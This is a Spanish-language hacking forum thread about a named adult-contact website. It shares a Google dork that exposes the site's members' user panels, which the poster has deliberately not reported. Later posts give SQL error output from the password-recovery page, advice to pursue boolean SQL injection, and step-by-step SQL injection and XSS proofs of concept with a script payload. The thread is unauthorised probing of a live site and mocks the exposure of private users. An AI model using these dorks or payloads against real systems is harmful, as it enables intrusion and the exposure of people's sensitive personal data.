[Google Hacking] Leak de Britishsexcontacts!!!

Iniciado por Rootkit_Pentester, Marzo 23, 2017, 11:22:40 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Marzo 23, 2017, 11:22:40 PM
Hola Gente. Si bien este fallo no es por sqli o xss. No deja de ser un bug de configuración del server al momento de ser indexado!!!.
Se explota con un simple Dork como este:

site:britishsexcontacts.com/ inurl:members

Lo cual nos permite acceder al panel de users de todos los miembros de esta pagina }:)
Aqui va un link:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No lo he reportado todavia al admin!!!.

Saludos y no se haz malos!!!.
Marzo 24, 2017, 12:22:58 PM #1
No podías utilizarlo en una floristería o en una empresa de oficinas heeee. ;D ;D ;D ;D ;D

Marzo 24, 2017, 07:58:56 PM #2
jajaja muy buena!!!.
Marzo 28, 2017, 06:08:29 PM #3
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No lo he reportado todavia al admin!!!.

Ya entiendo porque  8)
Marzo 28, 2017, 09:13:58 PM #4
Les cuento que jugando un poco con esto consegui un sql error. No lo he tratado de explotar aun
Abril 29, 2017, 06:27:11 AM #5
they have fixed it
Mayo 31, 2017, 09:16:44 AM #6
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola Gente. Si bien este fallo no es por sqli o xss. No deja de ser un bug de configuración del server al momento de ser indexado!!!.
Se explota con un simple Dork como este:

site:britishsexcontacts.com/ inurl:members

Lo cual nos permite acceder al panel de users de todos los miembros de esta pagina }:)
Aqui va un link:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No lo he reportado todavia al admin!!!.

Saludos y no se haz malos!!!.

bueniisimo el dork encontrado máquina, nos hemos hechado unas risas muy buenas cuando se lo he enseñado a unos colegas  ;D ;D ;D ;D

Un saludo!
Comprueba si tus datos han sido publicados haciendo click en la siguiente imagen:


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Mayo 31, 2017, 06:15:33 PM #7
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Citar
bueniisimo el dork encontrado máquina, nos hemos hechado unas risas muy buenas cuando se lo he enseñado a unos colegas  ;D ;D ;D ;D

Un saludo!

Gracias. Un saludo capo!. Y esperamos tus aportes!!!.
Mayo 27, 2018, 09:16:28 PM #8
Pues practicando un poquito de lo leído en el foro de XSS me han surgido unos Warning en el apartado de logueo y recuperar password ... o.O

CitarPassword Retrieval

Sorry, the email address ' was not found on our system

Click here to try again.



Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/vhosts/britishsexcontacts.com/www/Forgotten.php on line 25

Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /var/www/vhosts/britishsexcontacts.com/www/Forgotten.php on line 26

Mayo 30, 2018, 10:05:21 PM #9
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Pues practicando un poquito de lo leído en el foro de XSS me han surgido unos Warning en el apartado de logueo y recuperar password ... o.O

CitarPassword Retrieval

Sorry, the email address ' was not found on our system

Click here to try again.



Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/vhosts/britishsexcontacts.com/www/Forgotten.php on line 25

Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /var/www/vhosts/britishsexcontacts.com/www/Forgotten.php on line 26

Posiblemente vulnerable a sqli con booleanos, sigue por ese camino :D
Mi blog: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Si necesitas ayuda, no dudes en mandar MP
Junio 09, 2018, 09:19:25 PM #10
Mientras jugaba con tu dork, me di cuenta que britishsexcontacts[.]com es vulnerable a SQL INJECTION y XSS

--> SQL INJECTION
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta'

[!] ERROR SQL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 1' at line 1
SELECT Filename, Filename_Private FROM qdgirls WHERE ID = 47486' LIMIT 1;

-->XSS y SQL INJECTION
PoC_1

1.- En la pagina principal (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta) esta un apartado para realizar busquedas (quiero creer que de usuarios)
2.- Una vez identificado esta seccion ponemos una comilla simple ' y nos notificara el error SQL, el cual puede nos permite realizar una inyeccion
3.- En este mismo apartado ingresamos el payload de javascript '"><script>alert(/X/)</script> y nos levatara el alert

:3

--> XSS
PoC
1.- ingresamos a la pagina principal (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)
2.- Ya una vez dentro de la pagina, a la URL le agregamos /'"><script>alert(/X/)</script> para que nos quede de la siguiente forma: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta'"><script>alert(/X/)</script> y listo
Imprimir
Ir Arriba Páginas1
Acciones del Usuario